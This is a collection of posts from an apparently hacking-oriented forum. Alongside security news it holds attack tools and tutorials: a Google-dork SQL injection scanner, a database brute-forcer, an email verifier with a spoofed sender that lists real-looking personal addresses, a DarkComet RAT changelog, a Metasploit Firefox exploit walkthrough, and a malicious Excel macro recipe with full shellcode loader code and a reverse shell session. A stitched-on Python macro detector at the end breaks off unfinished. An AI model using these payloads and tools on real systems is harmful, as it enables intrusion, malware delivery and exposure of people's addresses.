Everything posted by Fi8sVrs
-
Want to make some easy profits in your free time?
Fi8sVrs replied to costy202002ro's topic in Cosul de gunoi
No. Spam! -
On the 4th of August at the world's largest technical security conference, BlackHat USA 2011, which will take place in Las Vegas, SAP security expert and CTO of ERPScan Alexander Polyakov will show how any malicious attacker can get access to systems running SAP via the Internet using a new critical vulnerability.

SAP systems are used in more than 100 000 companies worldwide to handle business-critical data and processes. In almost every Forbes 500 company these systems are used to handle every process, from purchasing, human resources and financial reporting to communication with other business systems. Thus an attacker who gains access gets complete control over the financial flow of the company, which can be used for espionage, sabotage and fraudulent actions against the hacked company.

The attack is possible due to a dangerous vulnerability of a new type, detected by Alexander in the J2EE engine of SAP NetWeaver software, which allows bypassing authorization checks. For example, it is possible to create a user and assign him to the administrators group using two unauthorized requests to the system. It is also dangerous because the attack is possible on systems protected by two-factor authentication, in which a secret key and a password are needed to get access. To prove it, researchers from ERPScan created a program which detects SAP servers on the Internet with the help of a secret Google keyword and checks the found servers for the potentially dangerous vulnerability. As a result, more than half of the available servers could be hacked with the help of the found vulnerability.

“The danger is that it is not only a new vulnerability, but a whole class of vulnerabilities that was theoretically described earlier but not popular in practice. During our research we only detected several examples in the standard system configuration, and because each company customizes the system for its own business processes, new examples of vulnerabilities of this class can potentially be detected at each company in the future. We have developed a free program which can detect unique vulnerabilities of this type in order to protect companies in time, and it is also included in our professional product – ERPScan Security Scanner for SAP,” noted Alexander.

Source
-
This video will demonstrate how a simple XSS vulnerability can be leveraged to gain complete control of your web-browser and eventually lead to a complete system compromise.

1) We will use a cross-site scripting vulnerability as the initial attack vector
2) Exploit XSS by redirecting the user’s browser to the Evil_IP with a JavaScript loop (every 2 secs)
3) Exploit the victim’s browser to gain system ‘root’ or ‘shell’ access
4) Elevate our privileges to system-level
5) Dump the memory contents from an active SSH session and steal the SSH password from the victim’s computer

Video: XSS Attack - Busting Browsers to Root! on Vimeo

CREDITS
Attack Demo by: Qjax - securitystreetknowledge.com
XSSF Framework by: Lodovic Courgnaud - CONIX Security
Putty Password Dump by: Colin Ames @ David Kerb
Music by: x1machine
-
@jKy_gbg you have a PM
-
Wordpress & ClassiPress Theme demo: http://www.appthemes.com/demo/?theme=classipress or search for: free classifieds ad script
-
HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

It works on Linux and Windows running the following:

Requirements:
- python
- python-qt4
- cx_Oracle
- python-mysqldb
- python-psycopg2
- python-pymssql
- python-qscintilla2

To install, simply run the following command in a terminal after changing directory to the path where the downloaded package is:

Icons and running the application:
The software icon can be found in the application menu of the GNOME desktop interfaces.
The icon can also be found at /usr/share/applications for KDE and also GNOME. There you find "HexorBase.desktop".

To get the source code for this project from SVN, here's the checkout link:

Here's a video on how the program works.
Video credits: "Maurizio Schmidt"
HexorBase - The Database Hacker Tool - YouTube

Download: http://hexorbase.googlecode.com/files/hexorbase_1.0_all.deb
Description: 249 KB Debian installer for linux based systems
SHA1 Checksum: 49ff0cf9e48341fef830f0744d29becfaaa37ad0

Download & source project
-
Yet Another Email Verifier 1.0

Verify emails by checking the "RCPT TO" return code from the SMTP server.

Hints:
- The output is separated by commas, so you can easily import it to another application (e.g. MS Excel).
- Create an address list by using the Smashing Email eXtractor!
- Failed checks are added at the bottom (! <domain>)

Requirements:
- python (tested with python 2.6.2)
- dnspython

Usage:
yaev.py <file>
file: absolute path to email-address list

Example:
$ cat addresses.txt
...
wolfgang.schaeuble@wk.bundestag.de
gm.schulz@gmail.com
jan.sipocz@gmail.com
brigitte.kopinits@gmail.com
r.buchmann@amag.at
annimarie.schaffer@gmail.com
iggy.popovic@gmail.com
erich.gabis@gmail.com
Kovacs.maria4@gmail.com
andreas.schimon@gmail.com
barbarajungreithmair@gmail.com
michael.gabis@gmail.com
$ ./yaev.py addresses.txt > checked_emails.txt
$ cat checked_emails.txt
...
wolfgang.schaeuble@wk.bundestag.de,mail1.dbtg.de,554,5.7.1 Service unavailable; Client host [83.187.177.131] blocked using zen.spamhaus.org; http://www.spamhaus.org/query/bl?ip=83.187.177.131
gm.schulz@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 6si6034pxi.95
jan.sipocz@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 13si2013478pxi.35
brigitte.kopinits@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 27si2008921pxi.56
r.buchmann@amag.at,srxx0055.amag.at,503,5.0.0 Need MAIL before RCPT
annimarie.schaffer@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 35si2021257pxi.2
iggy.popovic@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 37si2019611pxi.5
erich.gabis@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 2si2010789pxi.52
Kovacs.maria4@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 42si2017013pxi.17
andreas.schimon@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 9si2018016pxi.13
barbarajungreithmair@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 40si2003494pxi.87
michael.gabis@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 37si2019846pxi.5
!gmx.de

Code:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# yaev.py
#
# Version: 1.0
#
# Copyright (C) 2009 novacane novacane[at]dandies[dot]org
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# DO NOT FORGET TO INSTALL DNSPYTHON - http://www.dnspython.org/
#
# For more information visit:
# http://dandies.org/files/41b1d9240cf1df328f4e63d087769440-44.html
#

import os
import sys
import smtplib
import dns.resolver


def main(path_to_src_file):
    """
    Get SMTP return code

    Verify emails by checking the "RCPT TO" return code from the SMTP server.
    NOTE: dropped vrfy command because provider disabled it to prevent attacks
    """
    failed_domains = []
    try:
        # Open the Source-File.
        file_emails = open(path_to_src_file)
    except IOError:
        print "Error reading file!"
        print "!> " + path_to_src_file
        sys.exit(1)
    # Loop through addresses. Each line represents an email-address.
    for line in file_emails:
        # Remove Linefeed.
        line = line.replace("\n", "")
        # The actual domain.
        domain = line.split("@")[1]
        # Do nothing if domain is already in the failed_domain list.
        if not domain in failed_domains:
            try:
                # Make a MX DNS query.
                answers = dns.resolver.query(domain, "MX")
                # OR: mx = str(answers[1].exchange)[:-1]
                for rdata in answers:
                    # Remove the dot from rdata.exchange.
                    mx = str(rdata.exchange)[:-1]
                    try:
                        # Connect to SMTP server.
                        smtp = smtplib.SMTP(mx)
                        # Polite people say hello first.
                        smtp.docmd("HELO microsoft.com")
                        # Indicates who is sending the mail.
                        smtp.docmd("MAIL FROM:", "<asdf@microsoft.com>")
                        # Indicates who is receiving the mail.
                        rcpt = smtp.docmd("RCPT TO:", "<" + line + ">")
                        # Print output.
                        print line + "," + mx + "," + \
                            str(rcpt[0]) + "," + str(rcpt[1])
                        # Close SMTP connection.
                        smtp.quit()
                    except smtplib.SMTPServerDisconnected:
                        # Add domain to list.
                        failed_domains.append(domain)
                    # Use only the first server-address.
                    break
            # Raise exception if DNS query failed.
            except dns.resolver.NXDOMAIN:
                # Add domain to list.
                failed_domains.append(domain)
    # Close the Source-File.
    file_emails.close()
    # Output failed domains.
    if failed_domains:
        for item in failed_domains:
            print "!" + item


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "\n\t[*] yet another email verifier 1.0 [*]"
        print "\n\tUsage: yaev.py <file>"
        sys.exit(2)
    main(sys.argv[1])

Download source
-
Easily search for exploits in BackTrack's exploitdb (files.csv).

Highlights:
- Search the exploitdb archive
- Case sensitive & insensitive
- Change output mode
- Automatically copy your exploits

Requirements:
- python (tested with python 2.7.1 and 2.5.2)
- local exploitdb (pre-installed on BackTrack Linux)

Usage:

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -c, --casesensitive   switch to casesensitive
  -v, --verbose         detailed output
  -d PATH, --destination=PATH
                        path to copy exploits

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# exploitdbee.py
#
# Version: 1.0
#
# Copyright (C) 2011 novacane novacane[at]dandies[dot]org
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#

import sys
import os
import re
import shutil
from getpass import getpass
from optparse import OptionParser


def main(casesensitive, verbose, exploitpath, *args):
    exploitdbcsv = "/pentest/exploits/exploitdb/files.csv"
    if not os.path.isfile(exploitdbcsv):
        print "ERROR: EXPLOITDB DOESN'T EXIST"
        sys.exit(1)
    # Open the exploitdb.
    try:
        f = open(exploitdbcsv)
    except:
        print "ERROR: CAN'T OPEN EXPLOITDB - FILES.CSV"
        sys.exit(1)
    exploitlist = []
    # First: Search the exploitdb and save the results to a list.
    for line in f:
        if casesensitive:
            if re.search(re.escape(args[0][0]), line):
                exploitlist.append(line)
        elif not casesensitive:
            if re.search(re.escape(args[0][0]), line, re.I):
                exploitlist.append(line)
    # The number of loops is the number of arguments.
    i = 1
    arglen = len(args[0])
    # Second: Cleanup the initial list.
    # Loop through the list and remove all items which don't match the remaining argument(s).
    if arglen > 1:
        while True:
            # Make a copy of the list to iterate over it.
            for l in exploitlist[:]:
                if casesensitive:
                    if not re.search(re.escape(args[0][i]), l):
                        exploitlist.remove(l)
                elif not casesensitive:
                    if not re.search(re.escape(args[0][i]), l, re.I):
                        exploitlist.remove(l)
            i += 1
            if i == arglen:
                break
    # Output found exploits.
    for i in exploitlist:
        if verbose:
            print i.strip("\n")
        else:
            print i.split(",")[2] + " => " + i.split(",")[1]
    print "\n"
    print str(len(exploitlist)) + " EXPLOITS FOUND."
    f.close()
    if not exploitpath:
        sys.exit()
    # Copy the exploits.
    while True:
        try:
            copyinput = raw_input("Copy exploits to destination? [y/n]: ")
            if copyinput == "y":
                if os.path.isdir(exploitpath):
                    try:
                        for i in exploitlist:
                            shutil.copy("/pentest/exploits/exploitdb/" + i.split(",")[1], exploitpath)
                    except:
                        print "ERROR: CAN'T COPY FILES TO DESTINATION"
                        sys.exit(1)
                else:
                    print "ERROR: DESTINATION DOESN'T EXIST"
                break
            elif copyinput == "n":
                print "BYE"
                sys.exit()
            else:
                print "ERROR: WRONG INPUT"
        except KeyboardInterrupt:
            print "\n"
            sys.exit(1)


if __name__ == '__main__':
    help_message = "\n\t[*] exploitdbee 1.0 [*]\n\t[*] by dandies.org [*]\n\n\tTry: exploitdbee.py --help\n"
    usage = "\n %prog [-c] [-d path] <term1> <term2> <term3> <term...>\n %prog \"windows 7\" remote \
\n %prog -c Microsoft IIS -d /tmp"
    parser = OptionParser(usage=usage, version="%prog 1.0")
    parser.add_option("-c", "--casesensitive", action="store_true", dest="casesensitive", help="switch to casesensitive")
    parser.add_option("-v", "--verbose", action="store_true", dest="verbose", help="detailed output")
    parser.add_option("-d", "--destination", metavar="PATH", dest="exploitpath", help="path to copy exploits")
    (options, args) = parser.parse_args()
    if len(args) == 0:
        print help_message
        sys.exit(2)
    # Default values.
    if options.exploitpath:
        exploitpath = options.exploitpath
    else:
        exploitpath = ""
    if options.casesensitive:
        casesensitive = 1
    else:
        casesensitive = 0
    if options.verbose:
        verbose = 1
    else:
        verbose = 0
    main(casesensitive, verbose, exploitpath, args)

Download source
-
Netswipe turns your webcam into a credit card reader, brings POS payments to the desktop

Credit card fraud costs the banking industry billions of dollars every year, and with companies yet to find an entirely secure system for processing payments online, there's no end in sight for unauthorized transactions. Jumio hopes to bring both security and convenience to the world of online payments, however, with its webcam-based Netswipe secure card reader solution. The system replicates the point of sale (POS) transactions you experience when making in-store purchases, prompting cardholders to scan the front on their credit card, then enter their CVV code using a tamperproof mouse-controlled interface. We're not sure how the software is able to distinguish a physical credit card from, say, a photocopy of a card, but it certainly sounds more secure than the standard input form we use today. It also reduces card number theft from insecure forms and website spoofing, by verifying details through a live video stream. Jump past the break for the full press release, along with video overviews of Netswipe and Jumio, which recently secured $6.5 million in initial funding and is backed by Facebook co-founder Eduardo Saverin.

Video:
Viddler.com - Netswipe Webcam Credit Card Reader - Uploaded by engadget
Jumio The End of Cash on Vimeo

Netswipe turns your webcam into a credit card reader, brings POS payments to the desktop -- Engadget
-
PuTTY tutorial - How to use a nologin
Fi8sVrs replied to FearDotCom's topic in Tutoriale in romana
this has been posted before: http://rstcenter.com/forum/33499-hide-ip-cu-putty.rst -
[Linux] Problem with a stick
Fi8sVrs replied to GarryOne's topic in Sisteme de operare si discutii hardware
try with a Windows XP CD -
#!/usr/bin/python
#
# Dorker.py
# SQL Dork finder script that crawls google for sites vulnerable to SQL Injection
# Author: Xinapse
# Website: http://www.iexploit.org
# Email: iexploittube@gmail.com
# Twitter: #iExploitXinapse
# Version 0.0.1
# Usage dorker.py [options]

from xgoogle.search import GoogleSearch, SearchError
import time, urllib2, optparse

print '''
________                __
\______ \   ___________|  | __ ____ _______
 |    |  \ /  _ \_  __ \  |/ /_/ __ \\_  __ \
 |    `   (  <_> )  | \/    < \  ___/ |  | \/
/_______  /\____/|__|  |__|_ \ \___  >|__|
        \/                  \/     \/
---------------------------------------------------------------------------------
-- dorker.py --
-- SQL Dork finder script --
-- Author: Xinapse --
-- Website: http://www.iexploit.org --
-- Email: iexploittube@gmail.com --
-- Twitter: #iExploitXinapse --
-- Version 0.0.1 --
-- Usage dorker.py [options] --
---------------------------------------------------------------------------------
'''

parser = optparse.OptionParser()
options = optparse.OptionGroup(parser, 'Options')
parser.add_option('-d', '--dork', action='store', type='string', help='Dork to Scan', metavar='DORK')
parser.add_option('-f', '--file', action='store', type='string', help='Filename to save', metavar='FILE')
parser.add_option('-v', '--verbose', action="store_true", dest="verbose", default=False, help="Adds extra status messages showing program execution")
parser.add_option('-e', '--evasion', action='store', type='string', help='How long to sleep between each google request, used to prevent google blocking your IP for too many requests, recommended at least 5+, default 10', metavar='EVASION')
(opts, args) = parser.parse_args()

urlno = 0
invuln = 0
if opts.dork:
    dork = opts.dork
else:
    print '>> Please enter a dork'
if opts.file:
    filename = opts.file
else:
    print '>> Please enter a filename'
if opts.verbose:
    verbose = 'true'
else:
    verbose = 'false'
if opts.evasion:
    evas = opts.evasion
else:
    evas = 10
pagecount = 0
counter = 0

try:
    pagecount = pagecount + 1
    if verbose == 'true':
        print '>> Crawling google page ' + str(pagecount) + '...'
    search = GoogleSearch(dork)
    while True:
        search.results_per_page=100
        tmp = search.get_results()
        if not tmp:
            # Report the end of the result set before leaving the loop.
            if verbose == 'true':
                print '>> No more results...'
            break
        for t in tmp:
            try:
                url = t.url.encode("utf8")
                if verbose == 'true':
                    print '>> Testing ' + url + ' for vulnerabilities...'
                testurl = url + "'"
                req = urllib2.urlopen(testurl)
                data = req.read()
                if "sql" in data or "SQL" in data or "MySQL" in data or "MYSQL" in data or "MSSQL" in data:
                    f = open (filename, "a")
                    if verbose == 'true':
                        print ">> Found possible injection in " + url
                    f.write(testurl + "\n")
                    f.close()
                    counter = counter + 1
                else:
                    invuln = invuln + 1
            except:
                errors = 1
        if verbose == 'true':
            print '>> Sleeping to bypass google flood protection...'
        time.sleep(evas)
except SearchError, e:
    print ">> Search failed: %s" % e

print '>> Dorker scan ended'
print '>> ' + str(counter) + ' vulnerable sites found'
print '>> ' + str(invuln) + ' sites not vulnerable'
print '>> Thank you for using Dorker, output has been saved to ' + filename

Download xgoogle library: https://github.com/pkrumins/xgoogle

Dorker.py A SQL Injection Dork Scanner
-
---[by DarkCoderSc]---
- Button sidebar back with a nicer gui, for my chinese friends that prefer buttons
- [Active Ports] Now process name always display correctly
- Active Ports added to client in Socket list to help you to figure some problems or be sure all working fine
- Melt function totally recoded using another way via FWB++ work 100% of the time on 32 and 64bit systems.
- Uninstall function is more stable if not using persistence
- Persistence totally recoded using FWB++ working on 32 and 64bit.
- Process Manager refresh 2x faster
- Remote shell is now better
- File transfer is now more stable
- Webcam more stable
- Webcam can be stretched now
- Delete folder work fine now (recursive too)
- File creation added in remote list of file manager
- File modification added in remote list of file manager
- File attrib added in remote list of file manager (click on file attrib column for more info)
- I reinstall Delphi 2010 in english this time, so all label might be in english now
- Now client keep its size when restored from tray
- Now when you stop capture of desktop, last captured window picture stay
- New toast design
- FixComet available on DarkComet-RAT [Official Website]
- Mini Download (FASM) is now working 100% fine (no more "not Win32 valid...")
- Startup been optimized
- Startup use fwb++ to install
- Startup persistence use now fwb++ too
- upload logs to FTP now working fine
- Now you can choose which monitor to capture if the user got multi monitors (thanks mjord5 for the idea)
- Syntax highlighters was updated
- A big prob fix (now you can for example capture two desktop at the same time without any prob)

Download link: DarkComet-RAT [Official Website]
-
Today while surfing I read some news about nsTreeRange Mozilla Firefox version 3.5 to 3.6.1.6 Vulnerability. Actually this vulnerability ranking is not excellent or good, but it's normal vulnerability. This vulnerability was known at 2011-07-10 by sinn3r. In this tutorial I'm using Windows 7 for my victim Operating system with Mozilla Firefox v 3.5.17. If you also want to try out this tutorial, you can find Mozilla Firefox version which I describe above at oldapps.com.

Requirements :
1. Metasploit Framework
2. Linux OS or Backtrack 5 (Metasploit already included inside this distro)

I. The first step, just go to your msfconsole, and then use exploit/windows/browser/mozilla_nstreerange. If it returns cannot find exploit, maybe you should update your msf framework first by running msfupdate.

msf > use exploit/windows/browser/mozilla_nstreerange
msf exploit(mozilla_nstreerange) > show options

Module options (exploit/windows/browser/mozilla_nstreerange):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CreateThread  true             yes       Whether to execute the payload in a new thread
   SEHProlog     true             yes       Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit
   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL for incoming connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion    SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                        no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Auto (Direct attack against Windows XP, otherwise through Java, if enabled)

II. There are a few options you should set up first before launching this exploit.

SRVHOST : Your IP address acts as exploit server
SRVPORT : port use to serve request from victim. The default value is 8080 but if your port 80 was free, it's better to use port 80.
URIPATH : It's something looks like http://localhost/URIPATH, you can change this value to make URIPATH more readable by human e.g : http://localhost/ANTIVIRUS, etc.

In above picture I'm also using meterpreter reverse_tcp payload, but you can choose the most suitable payload for you.

III. Everything was set up correctly, then run exploit to run our malicious webserver.

IV. After the victim opened our malicious URL we've already sent to them, our server processing and create new notepad.exe process at victim computer. Below is the screenshot.

V. A new session ID 1 has been created, the next step we can interact with that session ID to gain privilege on victim computer.

That's it, we're already inside victim computer.

Countermeasure :
- Always update your Mozilla Firefox to the latest version.
- Use personal firewall to detect inbound and outbound traffic.

Hope it's useful

Hacking Mozilla Firefox 3.5 to 3.6 nsTreeRange Vulnerability Using Metasploit | Vishnu Valentino Hacking Tutorial, Tips and Trick
-
First, let's create our shellcode using metasploit's msfpayload:

For windows/exec payload:

root@coresec:~# msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai \
-c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > CALC.R
[*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 254 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 281 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 308 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 335 (iteration=5)

For reverse_tcp payload:

root@coresec:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.200.20 LPORT=4444 R | msfencode \
-e x86/shikata_ga_nai -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > RVR.R
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

For your own executable file:

root@coresec:~# msfencode -i backdoor.exe -e x86/shikata_ga_nai -c 10 \
-x /pentest/windows-binaries/pstools/psexec.exe -t raw > BD.R
[*] x86/shikata_ga_nai succeeded with size 66589 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 66618 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 66647 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 66676 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 66705 (iteration=5)

Next step is to convert shellcodes to VBScript using the shellcode2vbscript_v0_1 python tool from Didier Stevens:

root@coresec:~# wget http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip
--2011-04-23 14:30:31-- http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip
Resolving www.didierstevens.com... 173.201.107.126
Connecting to www.didierstevens.com|173.201.107.126|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1378 (1.3K) [application/x-zip-compressed]
Saving to: `shellcode2vbscript_v0_1.zip'

100%[===========================================================>] 1,378 --.-K/s in 0s

2011-04-23 14:30:52 (86.4 MB/s) - `shellcode2vbscript_v0_1.zip' saved [1378/1378]

root@coresec:~# mkdir shellcode2vbscript
root@coresec:~# unzip shellcode2vbscript_v0_1.zip -d shellcode2vbscript
Archive: shellcode2vbscript_v0_1.zip
  inflating: shellcode2vbscript/shellcode2vbscript.py
root@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py CALC.R CALC.vbs
root@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py RVR.R RVR.vbs
root@coresec:~# ls -al CALC.vbs RVR.vbs
-rw-r--r-- 1 root root 3418 Apr 23 14:29 CALC.vbs
-rw-r--r-- 1 root root 3888 Apr 23 14:30 RVR.vbs

Now, our VBScripts are ready, lets see the code of CALC.vbs:

Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As Integer
Private Declare Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long

Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40

Private Sub ExecuteShellCode()
    Dim lpMemory As Long
    Dim sShellCode As String
    Dim lResult As Long

    sShellCode = ShellCode()
    lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&)
    lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&)
End Sub

Private Function ParseBytes(strBytes) As String
    Dim aNumbers
    Dim sShellCode As String
    Dim iIter

    sShellCode = ""
    aNumbers = split(strBytes)
    for iIter = lbound(aNumbers) to ubound(aNumbers)
        sShellCode = sShellCode + Chr(aNumbers(iIter))
    next

    ParseBytes = sShellCode
End Function

Private Function ShellCode1() As String
    Dim sShellCode As String

    sShellCode = ""
    sShellCode = sShellCode + ParseBytes("218 203 184 213 89 140 182 217 116 36 244 95 51 201 177 78 131 239 252 49 71 19 3")
    sShellCode = sShellCode + ParseBytes("146 74 110 67 199 185 183 216 211 181 243 2 32 140 238 29 101 57 95 218 184 225 184")
    sShellCode = sShellCode + ParseBytes("102 82 237 186 48 149 215 242 145 177 70 202 221 13 155 44 133 217 202 138 232 188")
    sShellCode = sShellCode + ParseBytes("196 51 198 163 90 239 67 214 55 124 8 120 173 104 221 142 124 57 128 1 165 213 25")
    sShellCode = sShellCode + ParseBytes("211 78 145 37 3 200 28 171 244 145 218 247 129 189 181 255 86 252 194 249 233 79 245")
    sShellCode = sShellCode + ParseBytes("2 25 97 248 38 184 12 119 242 187 205 87 102 116 144 151 201 158 251 33 25 5 144 53")
    sShellCode = sShellCode + ParseBytes("100 184 8 207 129 122 171 10 62 99 17 116 34 148 79 156 42 73 228 18 96 6 167 143")
    sShellCode = sShellCode + ParseBytes("228 34 41 111 247 123 85 247 68 166 80 189 205 190 158 93 137 28 108 212 133 52 185")
    sShellCode = sShellCode + ParseBytes("215 180 95 192 145 200 108 24 117 173 140 206 118 82 154 64 167 202 183 53 137 2 91")
    sShellCode = sShellCode + ParseBytes("80 100 244 232 208 219 177 71 199 253 147 155 121 72 25 62 202 76 46 221 95 172 86")
    sShellCode = sShellCode + ParseBytes("237 36 238 199 178 145 95 176 119 135 37 122 45 141 64 166 103 5 48 237 174 171 192")
    sShellCode = sShellCode + ParseBytes("243 41 24 82 137 232 168 50 187 1 241 73 171 228 212 185 165 227 15 22 27 4 14 205")
    sShellCode = sShellCode + ParseBytes("66 211 92 161 216 171 236 199 7 240 255 87 192 38 121 162 8 216 18 111 250 92 45 32")
    sShellCode = sShellCode + ParseBytes("247 238 33 196 105 210 232 13 127 104 232 201 95 57 96 189 67 97 242 253 193 198 186")
    sShellCode = sShellCode + ParseBytes("109 199 61 47 71 59 141 138 186 249")

    ShellCode1 = sShellCode
End Function

Private Function ShellCode() As String
    Dim sShellCode As String

    sShellCode = ""
    sShellCode = sShellCode + ShellCode1()
    ShellCode = sShellCode
End Function

Then, we are able to insert the malicious VBScript to our Excel files (CALC.vbs -> CALC.xlsm & RVR.vbs -> RVR.xlsm):

Finally let's execute our Macros:

root@coresec:~# msfconsole

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|

       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 680 exploits - 354 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12397 updated yesterday (2011.04.21)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(handler) > set lhost 192.168.200.20
lhost => 192.168.200.20
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.200.20:4444
[*] Starting the payload handler...
[*] Sending stage (240 bytes) to 192.168.200.2
[*] Command shell session 1 opened (192.168.200.20:4444 -> 192.168.200.25:45668) at Sat Apr 23 14:54:32 +0300 2011

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\coresec\Documents>

NoVirusThanks results:

Download:
shellcode2vbscript_v0_1
RVR.xlsm
CALC.xlsm

Create Malicious Excel files using Metasploit and Shellcode2vbscript « AfterShell.com – IT Security Blog
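For triage of macro source that has already been extracted from a workbook, the structure of the CALC.vbs listing above gives three static signals: the VirtualAlloc / WriteProcessMemory / CreateThread declarations, the &H40 (PAGE_EXECUTE_READWRITE) constant, and long quoted runs of decimal byte values. The following is an added example, not part of the original post or of shellcode2vbscript; the function name, thresholds and both sample macros are constructed for illustration.

```python
import re

# The three Win32 imports the macro above declares to stage and start shellcode.
LOADER_APIS = ("VirtualAlloc", "WriteProcessMemory", "CreateThread")

# VBA 'Declare Function/Sub <name> Lib "<dll>"' statements (PtrSafe covers 64-bit Office).
DECLARE_RE = re.compile(
    r'^\s*(?:(?:Private|Public)\s+)?Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+'
    r'(\w+)\s+Lib\s+"([^"]+)"', re.I | re.M)

# A quoted run of 16 or more space-separated decimal numbers, the form ParseBytes() takes.
BYTE_RUN_RE = re.compile(r'"((?:\d{1,3} ){15,}\d{1,3})"')

# PAGE_EXECUTE_READWRITE written as the hex literal &H40 (but not &H400, &H4000, ...).
RWX_RE = re.compile(r'&H40(?![0-9A-F])', re.I)

# Assumed threshold: fewer embedded byte values than this is not treated as a payload.
MIN_EMBEDDED_BYTES = 32


def analyze_macro(source):
    """Return the static indicators found in one macro module and a verdict."""
    declared = {m.group(1).lower() for m in DECLARE_RE.finditer(source)}
    apis = [api for api in LOADER_APIS if api.lower() in declared]

    embedded = 0
    for m in BYTE_RUN_RE.finditer(source):
        values = [int(v) for v in m.group(1).split()]
        if max(values) <= 255:          # only count runs that are valid byte values
            embedded += len(values)

    rwx = bool(RWX_RE.search(source))

    if len(apis) == len(LOADER_APIS) and (rwx or embedded >= MIN_EMBEDDED_BYTES):
        verdict = "shellcode-loader"
    elif apis or embedded >= MIN_EMBEDDED_BYTES:
        verdict = "review"
    else:
        verdict = "clean"
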